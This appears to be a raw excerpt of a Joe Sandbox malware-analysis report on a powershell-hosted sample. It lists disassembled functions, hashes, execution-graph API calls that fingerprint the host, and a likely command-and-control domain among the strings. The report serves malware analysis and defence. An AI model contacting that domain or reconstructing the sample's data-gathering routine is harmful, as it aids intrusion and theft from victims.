                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$'$/$5
                                                                                              • API String ID: 0-2690663763
                                                                                              • Opcode ID: f06059ca1dcbf024a6083bb662e82f524ffac1c4cfa4fd9a5bfed0c25bd37d7c
                                                                                              • Instruction ID: f3e9b888e439a937798c0937c1941e0aa0c02a33f4a1478ed66fa548c02b5a6f
                                                                                              • Opcode Fuzzy Hash: f06059ca1dcbf024a6083bb662e82f524ffac1c4cfa4fd9a5bfed0c25bd37d7c
                                                                                              • Instruction Fuzzy Hash: 6F5102B8A15209EFDB50CF98D488BDDB7F2BB09314F548155E809A7291C375AD85CF50
                                                                                              Function 0AA65729 Relevance: 5.1, Strings: 4, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$'$/$5
                                                                                              • API String ID: 0-2690663763
                                                                                              • Opcode ID: f24b6e05c37b0f7dece62cdb2a6b35413f366373b4c0b3b1a0de5312245c6d49
                                                                                              • Instruction ID: 6924bcd27aaf5c12423eaef23c75c42bd9d92826e7f4a2709ee65d87f54d7491
                                                                                              • Opcode Fuzzy Hash: f24b6e05c37b0f7dece62cdb2a6b35413f366373b4c0b3b1a0de5312245c6d49
                                                                                              • Instruction Fuzzy Hash: 64412578A05209EFDB50CF58D888BDDB7F2FB09324F548199E809A7391C375A985CF51
                                                                                              Function 0AA656EA Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$'$/$5
                                                                                              • API String ID: 0-2690663763
                                                                                              • Opcode ID: 31ea37ef0b5b3764537e99dce561fdb794434acf2cd721ee9d031f439882f9b5
                                                                                              • Instruction ID: c43f2c8868022f7e18c477802677abaff94d17f64c9ae99684861dd17d0f986b
                                                                                              • Opcode Fuzzy Hash: 31ea37ef0b5b3764537e99dce561fdb794434acf2cd721ee9d031f439882f9b5
                                                                                              • Instruction Fuzzy Hash: 1E4102B8A05209EFDB50CF98D888ADDB7B2BB09324F548155E809A7391C375AD86CF50
                                                                                              Function 0AA656D4 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$'$/$5
                                                                                              • API String ID: 0-2690663763
                                                                                              • Opcode ID: a5e0943c5add6dd2185e7da6a699963ce7f7eb82c18f123666f6ae81a082e0a4
                                                                                              • Instruction ID: c43f2c8868022f7e18c477802677abaff94d17f64c9ae99684861dd17d0f986b
                                                                                              • Opcode Fuzzy Hash: a5e0943c5add6dd2185e7da6a699963ce7f7eb82c18f123666f6ae81a082e0a4
                                                                                              • Instruction Fuzzy Hash: 1E4102B8A05209EFDB50CF98D888ADDB7B2BB09324F548155E809A7391C375AD86CF50
                                                                                              Function 0AA65E5B Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$'$/$5
                                                                                              • API String ID: 0-2690663763
                                                                                              • Opcode ID: ee103166b102e43631d1e1217b06118f348a0727b6f23c84fc2a19abb33f4e20
                                                                                              • Instruction ID: da3bd40bcdadd09b3bda6cec8705e00d2b454553953b17b01d4273c9dbd91cdf
                                                                                              • Opcode Fuzzy Hash: ee103166b102e43631d1e1217b06118f348a0727b6f23c84fc2a19abb33f4e20
                                                                                              • Instruction Fuzzy Hash: EE4102B8E15209EFDB50CF98D888ADDB7F2FB09324F548155E809A7391C335A985CF51
                                                                                              Function 0AA65B93 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$'$/$5
                                                                                              • API String ID: 0-2690663763
                                                                                              • Opcode ID: b5f8e4ae3d2afb929fa1e07641e76a1205845239fd4c9931bca513165c129278
                                                                                              • Instruction ID: d82b266b4c7ab5973d4a12fe69583b705288d24f330625f1ea0bdb5a7a99884f
                                                                                              • Opcode Fuzzy Hash: b5f8e4ae3d2afb929fa1e07641e76a1205845239fd4c9931bca513165c129278
                                                                                              • Instruction Fuzzy Hash: 544122B8E05209EFDB50CF98D888BDDB7F2BB09324F548155E809A7391C375A985CF50
                                                                                              Function 0AA6570E Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$%$'$4
                                                                                              • API String ID: 0-2746513181
                                                                                              • Opcode ID: 2cf50f45d2999cd318fcb895b26af8507c9ce8d65611c6d570e99c138d5d1827
                                                                                              • Instruction ID: 3bc5d444ce9af33ee330786d32971b5bd9919507f469bbb6bbcb8ba1e5650a4d
                                                                                              • Opcode Fuzzy Hash: 2cf50f45d2999cd318fcb895b26af8507c9ce8d65611c6d570e99c138d5d1827
                                                                                              • Instruction Fuzzy Hash: E211F278915219EFDB54CF48D488BDCB7F2BB09314F548598E409AB291C336AC86CF41
                                                                                              Function 04E7203F Relevance: 5.0, Strings: 4, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: q$q$q$q
                                                                                              • API String ID: 0-594874556
                                                                                              • Opcode ID: 6d68df999006a2f2f486e7596b877141941540aee5647fe5db0bbfbab61c19fb
                                                                                              • Instruction ID: 8fb2c17aca2b5dc6699652ceca4ab38e7934b8611cbf910616f4686bb60c1172
                                                                                              • Opcode Fuzzy Hash: 6d68df999006a2f2f486e7596b877141941540aee5647fe5db0bbfbab61c19fb
                                                                                              • Instruction Fuzzy Hash: 7AF0A956C0E3DD9FD323562998396A5BFA05F23320F4900E78D988F9D3F48D186AC356

                                                                                              Execution Graph

                                                                                              Execution Coverage:7.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:26.8%
                                                                                              Total number of Nodes:213
                                                                                              Total number of Limit Nodes:15
                                                                                              execution_graph 13690 43f002 13691 43f00b 13690->13691 13692 43f049 13691->13692 13694 43e9f0 LdrInitializeThunk 13691->13694 13692->13692 13694->13692 13695 424801 13696 424808 13695->13696 13697 424818 RtlExpandEnvironmentStrings 13696->13697 13698 42483d 13697->13698 13706 4419f0 13698->13706 13700 424951 13701 424b24 13700->13701 13702 424af1 13700->13702 13704 42497e 13700->13704 13710 421000 13701->13710 13704->13704 13705 4419f0 LdrInitializeThunk 13704->13705 13705->13702 13707 441a10 13706->13707 13708 441aee 13707->13708 13722 43e9f0 LdrInitializeThunk 13707->13722 13708->13700 13723 441880 13710->13723 13712 421040 13716 421601 13712->13716 13720 4210b9 13712->13720 13727 43e9f0 LdrInitializeThunk 13712->13727 13714 4215de 13715 43cf60 RtlFreeHeap 13714->13715 13718 4215ee 13715->13718 13716->13702 13718->13716 13733 43e9f0 LdrInitializeThunk 13718->13733 13720->13714 13728 43e9f0 LdrInitializeThunk 13720->13728 13729 43cf60 13720->13729 13722->13708 13725 4418a0 13723->13725 13724 44199e 13724->13712 13725->13724 13734 43e9f0 LdrInitializeThunk 13725->13734 13727->13712 13728->13720 13730 43cf93 RtlFreeHeap 13729->13730 13731 43cf8d 13729->13731 13732 43cf75 13729->13732 13730->13732 13731->13730 13732->13720 13733->13718 13734->13724 13735 40df45 13736 40df55 13735->13736 13769 4246c0 13736->13769 13738 40df5b 13739 424da0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 13738->13739 13740 40df7b 13739->13740 13741 4251e0 RtlFreeHeap LdrInitializeThunk 13740->13741 13742 40df9b 13741->13742 13743 427670 RtlFreeHeap LdrInitializeThunk 13742->13743 13744 40dfc4 13743->13744 13745 427a20 RtlFreeHeap LdrInitializeThunk 13744->13745 13746 40dfcd 13745->13746 13747 42a0b0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 13746->13747 13748 40dfd6 13747->13748 13749 429230 RtlExpandEnvironmentStrings 13748->13749 13750 40dff6 13749->13750 13751 435480 6 API calls 13750->13751 13752 40e01f 13751->13752 13753 4246c0 RtlExpandEnvironmentStrings 13752->13753 13754 40e046 13753->13754 13755 424da0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 13754->13755 13756 40e066 13755->13756 13757 4251e0 RtlFreeHeap LdrInitializeThunk 13756->13757 13758 40e086 13757->13758 13759 427670 RtlFreeHeap LdrInitializeThunk 13758->13759 13760 40e0af 13759->13760 13761 427a20 RtlFreeHeap LdrInitializeThunk 13760->13761 13762 40e0b8 13761->13762 13763 42a0b0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 13762->13763 13764 40e0c1 13763->13764 13765 429230 RtlExpandEnvironmentStrings 13764->13765 13766 40e0e1 13765->13766 13767 435480 6 API calls 13766->13767 13768 40e10a 13767->13768 13770 424710 13769->13770 13770->13770 13771 424726 RtlExpandEnvironmentStrings 13770->13771 13772 424780 13771->13772 13772->13772 13773 40e146 13774 40e14c 13773->13774 13775 40e15b CoUninitialize 13774->13775 13776 40e180 13775->13776 13777 430c45 13778 430c93 SysAllocString 13777->13778 13780 430eeb 13778->13780 13786 40e6c9 13791 412580 13786->13791 13788 40e6cf 13789 412580 5 API calls 13788->13789 13790 40e6e6 13789->13790 13800 412599 13791->13800 13792 4125a0 13792->13788 13793 413fec CreateProcessW 13793->13800 13794 412c73 RtlExpandEnvironmentStrings 13794->13800 13795 412f0d RtlExpandEnvironmentStrings 13795->13800 13796 43cf60 RtlFreeHeap 13796->13800 13799 43e9f0 LdrInitializeThunk 13799->13800 13800->13792 13800->13793 13800->13794 13800->13795 13800->13796 13800->13799 13801 441700 13800->13801 13805 441cc0 13800->13805 13802 441720 13801->13802 13802->13802 13803 44181e 13802->13803 13811 43e9f0 LdrInitializeThunk 13802->13811 13803->13800 13806 441cff 13805->13806 13807 441cd9 13805->13807 13806->13800 13807->13806 13812 43e9f0 LdrInitializeThunk 13807->13812 13809 441d28 13809->13806 13813 43e9f0 LdrInitializeThunk 13809->13813 13811->13803 13812->13809 13813->13806 13814 40d80a 13815 40d820 13814->13815 13818 439fb0 13815->13818 13817 40d931 13817->13817 13819 439fe0 CoCreateInstance 13818->13819 13821 43a35b SysAllocString 13819->13821 13822 43a72f 13819->13822 13825 43a3e6 13821->13825 13823 43a73f GetVolumeInformationW 13822->13823 13833 43a761 13823->13833 13826 43a71e SysFreeString 13825->13826 13827 43a3ee CoSetProxyBlanket 13825->13827 13826->13822 13828 43a714 13827->13828 13829 43a40e SysAllocString 13827->13829 13828->13826 13831 43a4e0 13829->13831 13831->13831 13832 43a50f SysAllocString 13831->13832 13835 43a536 13832->13835 13833->13817 13834 43a702 SysFreeString SysFreeString 13834->13828 13835->13834 13836 43a6f8 SysFreeString 13835->13836 13837 43a57a VariantInit 13835->13837 13836->13834 13840 43a5d0 13837->13840 13838 43a6e4 VariantClear 13839 43a6f5 13838->13839 13839->13836 13840->13838 13841 43ecc9 13843 43ed10 13841->13843 13842 43f45e 13843->13842 13845 43e9f0 LdrInitializeThunk 13843->13845 13845->13842 13846 43f08d 13847 43f097 13846->13847 13850 43f0be 13846->13850 13847->13850 13853 43e9f0 LdrInitializeThunk 13847->13853 13852 43e9f0 LdrInitializeThunk 13850->13852 13851 43f138 13852->13851 13853->13850 13854 4086d0 13856 4086de 13854->13856 13855 408871 ExitProcess 13856->13855 13857 4086f3 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW GetForegroundWindow 13856->13857 13860 408855 13856->13860 13858 408730 13857->13858 13858->13860 13861 40cf00 CoInitializeEx 13858->13861 13860->13855 13867 417953 13871 417960 13867->13871 13868 417b40 13873 41b730 13868->13873 13870 417b96 13871->13868 13871->13870 13872 4419f0 LdrInitializeThunk 13871->13872 13872->13871 13875 41b752 13873->13875 13874 4148b0 LdrInitializeThunk 13874->13875 13875->13874 13876 40de12 13877 40de1c 13876->13877 13879 40de36 13876->13879 13877->13879 13880 43e9f0 LdrInitializeThunk 13877->13880 13880->13879 13881 42e556 13882 42e561 13881->13882 13882->13882 13883 42e87e GetPhysicallyInstalledSystemMemory 13882->13883 13884 42e8c0 13883->13884 13885 4323d7 CoSetProxyBlanket 13886 4392d6 13887 4392db 13886->13887 13888 4392f3 GetUserDefaultUILanguage 13887->13888 13889 43931b 13888->13889 13890 438ce3 13892 438ce8 13890->13892 13891 438cf0 13892->13891 13894 43e9f0 LdrInitializeThunk 13892->13894 13894->13892 13895 420920 13896 420980 13895->13896 13897 42092e 13895->13897 13901 420a40 13897->13901 13902 420a50 13901->13902 13902->13902 13903 4419f0 LdrInitializeThunk 13902->13903 13904 420b1f 13903->13904 13905 439da0 13907 439dc5 13905->13907 13908 439e05 13907->13908 13914 43e9f0 LdrInitializeThunk 13907->13914 13909 439e97 13908->13909 13911 439f44 13908->13911 13913 43e9f0 LdrInitializeThunk 13908->13913 13909->13911 13915 43e9f0 LdrInitializeThunk 13909->13915 13913->13908 13914->13907 13915->13909 13916 43eeee 13917 43ef0c 13916->13917 13919 43ef2e 13916->13919 13917->13919 13920 43e9f0 LdrInitializeThunk 13917->13920 13920->13919 13921 431633 SysFreeString 13922 43184b 13921->13922 13923 43e970 13924 43e996 13923->13924 13925 43e9b5 13923->13925 13926 43e988 13923->13926 13927 43e9aa 13923->13927 13929 43e99b RtlReAllocateHeap 13924->13929 13928 43cf60 RtlFreeHeap 13925->13928 13926->13924 13926->13925 13926->13927 13928->13927 13929->13927 13930 43cfb0 13932 43cfce 13930->13932 13935 43cfee 13930->13935 13931 43d187 13932->13935 13938 43e9f0 LdrInitializeThunk 13932->13938 13934 43cf60 RtlFreeHeap 13934->13931 13935->13931 13937 43d0ae 13935->13937 13939 43e9f0 LdrInitializeThunk 13935->13939 13937->13934 13938->13935 13939->13937 13940 43ebb7 GetForegroundWindow 13944 440830 13940->13944 13942 43ebc7 GetForegroundWindow 13943 43ebe0 13942->13943 13945 440846 13944->13945 13945->13942 13946 40cf35 CoInitializeSecurity 13948 4362b4 13949 4362b9 13948->13949 13952 436470 13949->13952 13953 4364ad GetObjectW 13952->13953 13955 4365b2 13953->13955

                                                                                              Executed Functions

                                                                                              Function 00412580 Relevance: 185.7, APIs: 3, Strings: 102, Instructions: 1979COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$$$&$'$'$($+$.$0$2$3$4$6$9$9$9$:$;$;$<$<$=$=$?$?$@$A$A$A$B$B$C$C$D$D$D$D$E$E$E$F$F$G$G$I$I$J$J$K$K$L$M$M$O$Q$S$U$W$X$Y$Y$Z$Z$[$[$[$]$]$_$_$`$`$`$a$b$c$d$e$f$g$h$i$i$j$k$l$m$n$o$t$t$t$u$v$v$w$w$z$|$|$|$}
                                                                                              • API String ID: 0-1602101185
                                                                                              • Opcode ID: 3f5e131496a8919f902c18ecbf9840b332feaf0ccaf41ae64302d859573fa1fd
                                                                                              • Instruction ID: 556b6f16405857debad7af4118ca842e6bbcee22fb2c9664cffc39d7541dbcdc
                                                                                              • Opcode Fuzzy Hash: 3f5e131496a8919f902c18ecbf9840b332feaf0ccaf41ae64302d859573fa1fd
                                                                                              • Instruction Fuzzy Hash: 2303D07150C7C08BD324DB3884453DFBBD1ABD6324F188A6EE4E9873C2D6B989868757
                                                                                              Function 00439FB0 Relevance: 30.5, APIs: 12, Strings: 5, Instructions: 769memorycomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 446 439fb0-439fd3 447 439fe0-43a013 446->447 447->447 448 43a015-43a026 447->448 449 43a030-43a044 448->449 449->449 450 43a046-43a087 449->450 451 43a090-43a0b9 450->451 451->451 452 43a0bb-43a0d8 451->452 454 43a1aa-43a1b5 452->454 455 43a0de-43a0e9 452->455 456 43a1c0-43a1ef 454->456 457 43a0f0-43a133 455->457 456->456 458 43a1f1-43a248 456->458 457->457 459 43a135-43a14b 457->459 460 43a250-43a29d 458->460 461 43a150-43a19b 459->461 460->460 462 43a29f-43a2ef 460->462 461->461 463 43a19d-43a1a2 461->463 464 43a2f0-43a304 462->464 463->454 464->464 465 43a306-43a355 CoCreateInstance 464->465 466 43a35b-43a394 465->466 467 43a72f-43a75f call 440170 GetVolumeInformationW 465->467 468 43a3a0-43a3bb 466->468 472 43a761-43a765 467->472 473 43a769-43a76b 467->473 468->468 471 43a3bd-43a3e8 SysAllocString 468->471 478 43a71e-43a72b SysFreeString 471->478 479 43a3ee-43a408 CoSetProxyBlanket 471->479 472->473 474 43a77d-43a788 473->474 476 43a7a1-43a7ba 474->476 477 43a78a-43a791 474->477 481 43a7c0-43a852 476->481 477->476 480 43a793-43a79f 477->480 478->467 482 43a714-43a71a 479->482 483 43a40e-43a41e 479->483 480->476 481->481 484 43a858-43a88f 481->484 482->478 485 43a420-43a45b 483->485 486 43a890-43a8b7 484->486 485->485 487 43a45d-43a4d5 SysAllocString 485->487 486->486 488 43a8b9-43a8e7 call 41d6a0 486->488 489 43a4e0-43a50d 487->489 494 43a8f0-43a8f7 488->494 489->489 490 43a50f-43a538 SysAllocString 489->490 495 43a702-43a712 SysFreeString * 2 490->495 496 43a53e-43a560 490->496 494->494 497 43a8f9-43a90a 494->497 495->482 504 43a566-43a569 496->504 505 43a6f8-43a6ff SysFreeString 496->505 498 43a770-43a777 497->498 499 43a910-43a923 call 407f80 497->499 498->474 501 43a928-43a92f 498->501 499->498 504->505 506 43a56f-43a574 504->506 505->495 506->505 507 43a57a-43a5cf VariantInit 506->507 508 43a5d0-43a5ff 507->508 508->508 509 43a601-43a61d 508->509 511 43a623-43a629 509->511 512 43a6e4-43a6f5 VariantClear 509->512 511->512 513 43a62f-43a63d 511->513 512->505 515 43a63f-43a644 513->515 516 43a67d 513->516 517 43a65c-43a660 515->517 518 43a67f-43a6a7 call 407f00 call 408cb0 516->518 519 43a662-43a66b 517->519 520 43a650 517->520 529 43a6a9 518->529 530 43a6ae-43a6ba 518->530 523 43a672-43a676 519->523 524 43a66d-43a670 519->524 522 43a651-43a65a 520->522 522->517 522->518 523->522 526 43a678-43a67b 523->526 524->522 526->522 529->530 531 43a6c1-43a6e1 call 407f30 call 407f10 530->531 532 43a6bc 530->532 531->512 532->531
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(G\]R,00000000,00000001,E4E7E6FC,00000000), ref: 0043A34D
                                                                                              • SysAllocString.OLEAUT32(49FF4FFC), ref: 0043A3C2
                                                                                              • CoSetProxyBlanket.COMBASE(8E262A46,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A400
                                                                                              • SysAllocString.OLEAUT32(8B3B893F), ref: 0043A462
                                                                                              • SysAllocString.OLEAUT32(A7E3A517), ref: 0043A514
                                                                                              • VariantInit.OLEAUT32(?), ref: 0043A57F
                                                                                              • VariantClear.OLEAUT32(?), ref: 0043A6E5
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043A6FF
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043A70C
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043A712
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0043A71F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Free$Alloc$Variant$BlanketClearCreateInitInstanceProxy
                                                                                              • String ID: :;$G\]R$IF$hijk$z\]R
                                                                                              • API String ID: 3715141246-3519104951
                                                                                              • Opcode ID: fa999ecb37df6b5dd0c665693444311956b52ae9e9c497f195d4a3b203ce0d91
                                                                                              • Instruction ID: 9c6aada4eaddc2b9597c854a22b30d22fb1b76f87f63184c0f841c8e27c6c3f4
                                                                                              • Opcode Fuzzy Hash: fa999ecb37df6b5dd0c665693444311956b52ae9e9c497f195d4a3b203ce0d91
                                                                                              • Instruction Fuzzy Hash: BE423176A483409BD310CF28C881B6BBBE2EBC9314F18992EE5D5C7391D778D805CB86
                                                                                              Function 0040E146 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 337COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 657 40e146-40e177 call 435640 call 409650 CoUninitialize 662 40e180-40e194 657->662 662->662 663 40e196-40e1b3 662->663 664 40e1c0-40e211 663->664 664->664 665 40e213-40e273 664->665 666 40e280-40e2a2 665->666 666->666 667 40e2a4-40e2b5 666->667 668 40e2b7-40e2c5 667->668 669 40e2db-40e2ea 667->669 670 40e2d0-40e2d9 668->670 671 40e2ec-40e2ed 669->671 672 40e2fd 669->672 670->669 670->670 674 40e2f0-40e2f9 671->674 673 40e300-40e30d 672->673 676 40e32b-40e333 673->676 677 40e30f-40e316 673->677 674->674 675 40e2fb 674->675 675->673 679 40e335-40e336 676->679 680 40e34b-40e355 676->680 678 40e320-40e329 677->678 678->676 678->678 681 40e340-40e349 679->681 682 40e357-40e35b 680->682 683 40e36b-40e377 680->683 681->680 681->681 684 40e360-40e369 682->684 685 40e391-40e4af 683->685 686 40e379-40e37b 683->686 684->683 684->684 687 40e4b0-40e4f4 685->687 688 40e380-40e38d 686->688 687->687 689 40e4f6-40e512 687->689 688->688 690 40e38f 688->690 691 40e520-40e54e 689->691 690->685 691->691 692 40e550-40e577 call 40b9e0 691->692 694 40e57c-40e596 692->694
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: Uninitialize
                                                                                              • String ID: 3$M$W_$idealizetreez.shop$ojid
                                                                                              • API String ID: 3861434553-894007666
                                                                                              • Opcode ID: 369850a9eef2028b93f29a27db5f571c9ce2d4edaef49674df095886106cf042
                                                                                              • Instruction ID: 2b3d602b92645629efd6c7bb616832848048db914cf688040aed7acb0dfef423
                                                                                              • Opcode Fuzzy Hash: 369850a9eef2028b93f29a27db5f571c9ce2d4edaef49674df095886106cf042
                                                                                              • Instruction Fuzzy Hash: 61A1017414D3D28BC3258F26C4917EBFFE1AFA6304F18496ED4C99B282D7384506CBA6
                                                                                              Function 00424801 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 420COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 695 424801-424806 696 424808-42480d 695->696 697 42480f 695->697 698 424812-424836 call 407f00 RtlExpandEnvironmentStrings 696->698 697->698 701 424843 698->701 702 424870 698->702 703 424860-424866 call 407f10 698->703 704 424878-424880 698->704 705 424849-424852 call 407f10 698->705 706 42483d 698->706 701->705 702->704 703->702 707 424882-424887 704->707 708 424889 704->708 705->703 706->701 711 424890-4248c5 call 407f00 707->711 708->711 716 4248d0-4248e4 711->716 716->716 717 4248e6-4248ee 716->717 718 4248f0-4248f5 717->718 719 424911-42491e 717->719 720 424900-42490f 718->720 721 424920-424924 719->721 722 424941-42495d call 4419f0 719->722 720->719 720->720 723 424930-42493f 721->723 726 424b02-424b17 722->726 727 424964-424977 722->727 728 424b24-424bcf 722->728 729 424c3b-424c53 722->729 730 42497e-42498e 722->730 731 424b1e 722->731 723->722 723->723 726->729 726->731 733 424d5d 726->733 734 424d63-424d69 call 407f10 726->734 735 424d81-424d8a call 407f10 726->735 736 424c25-424c2b call 407f10 726->736 737 424d7b 726->737 738 424c2e-424c3a 726->738 739 424c1f 726->739 740 424d6c-424d72 call 407f10 726->740 727->726 727->728 727->729 727->730 727->731 727->733 743 424bd0-424bfd 728->743 732 424c60-424c72 729->732 741 424990-424995 730->741 742 424997 730->742 732->732 744 424c74-424cf5 732->744 734->740 736->738 737->735 739->736 740->737 746 424999-424a3f call 407f00 741->746 742->746 743->743 747 424bff-424c0f call 421000 743->747 751 424d00-424d30 744->751 762 424a40-424a8d 746->762 760 424c14-424c17 747->760 751->751 758 424d32-424d55 call 420b50 751->758 758->733 760->739 762->762 764 424a8f-424a97 762->764 765 424ab1-424abe 764->765 766 424a99-424a9e 764->766 768 424ac0-424ac4 765->768 769 424ae1-424afb call 4419f0 765->769 767 424aa0-424aaf 766->767 767->765 767->767 770 424ad0-424adf 768->770 769->726 769->729 769->731 769->733 769->734 769->735 769->736 769->737 769->738 769->739 769->740 770->769 770->770
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 0042482B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: .LB$DY$E4$O_
                                                                                              • API String ID: 237503144-4141438319
                                                                                              • Opcode ID: 4581ddcc33f8de4a325391635a0e9ac4ea3f0fc6e365032a7efce5f1f905d325
                                                                                              • Instruction ID: d59e21afe75c919d7885b81db84ffd528a74214148cacd6e1269b410aa5a2202
                                                                                              • Opcode Fuzzy Hash: 4581ddcc33f8de4a325391635a0e9ac4ea3f0fc6e365032a7efce5f1f905d325
                                                                                              • Instruction Fuzzy Hash: 05D1CBB8608341CFD300DF65E89166BBBF4FB92318F44892DE5858B252E778D945CB4B
                                                                                              Function 0042E435 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 402COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
